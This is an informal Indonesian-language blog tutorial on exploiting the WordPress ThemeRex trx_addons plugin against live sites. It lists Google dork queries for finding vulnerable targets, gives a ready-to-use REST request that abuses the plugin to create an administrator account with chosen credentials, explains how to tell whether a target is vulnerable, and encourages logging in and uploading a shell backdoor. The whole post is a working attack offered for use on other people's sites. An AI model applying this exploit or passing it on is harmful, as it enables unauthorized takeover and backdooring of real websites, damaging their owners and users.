-
Hai sobat
Saya ikal,
Disini saya akan sharing - sharing sesuatu nih.
-
Sesuai judul kita kali ini, kita akan kembali membahas sebuah exploit yang berada pada Wordpress, jadi kemarin kemarin saya melihat seseorang soof dengan proof Wordpress themerex add admin. Saya pun langsung mencari cari referensi untuk sebuah proof tersebut. dan hasilnya banyak artikel yang menuliskan bahwa itu adalah 0day exploit :D
lihat, 0day exploit :D. Lalu satu hari kemudian saya melihat sebuah konten youtube mengenai exploit tersebut, dan kebetulan kontennya singkat-padat-jelas. untuk link youtubenya nanti saya cantumkan di akhir ya......
Bahan :
- Google Dork :
"wp/wp-content/plugins/trx_addons"
"blog/wp-content/plugins/trx_addons"
"test/wp-content/plugins/trx_addons"
"wordpress/wp-content/plugins/trx_addons"
- Exploit :
/wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=Haikal&user_pass=Haikal
- Webshell :
nah seperti itu tampilan dari live target nya. Lanjut salin exploit dan masukan keurl targetnya. Contohnya seperti ini :
data [angka]
angka akan disesuaikan dengan berapa banyak user yang tersimpan didalam database. Jadi jika angka yang kalian dapat bukan 7, itu tidak masalah.
Dan jika target kalian memunculkan response seperti di bawah ini maka itu artinya kalian ga cocok :D.
diatas sana muncul kata
status 404
Nah itu menandakan bahwa request yang disubmit itu tidak ada atau 404. ya gitulah pokonya :D. Jika target vuln, kalian lanjut akses admin login dan masukan username,dan password nya.
Yaitu :
U : Haikal
P : Haikal
klik Login dan kalian akan diarahkan ke dashboard admin.
Nah berhasil kan :D. Selanjutnya kalian gunakan akal cerdas kalian untuk mengupload shell backdoor kalian.
*Note : di live target saya kali ini, jika kalian memasukan exploit nya dengan username,password Haikal kedalam url, maka akan muncul
0 "Sorry, that username already exists!"
Karena apa? karena username tersebut sudah terdaftar didalam list yang ada didatabase.Nah segini aja pembahasan kali ini mengenai Wordpress themerex add admin,
Jika ada yang kurang atau salah kata biarkan saja.
Referensi : https://www.youtube.com/watch?v=-dofdrDlrcg
Thanks
See U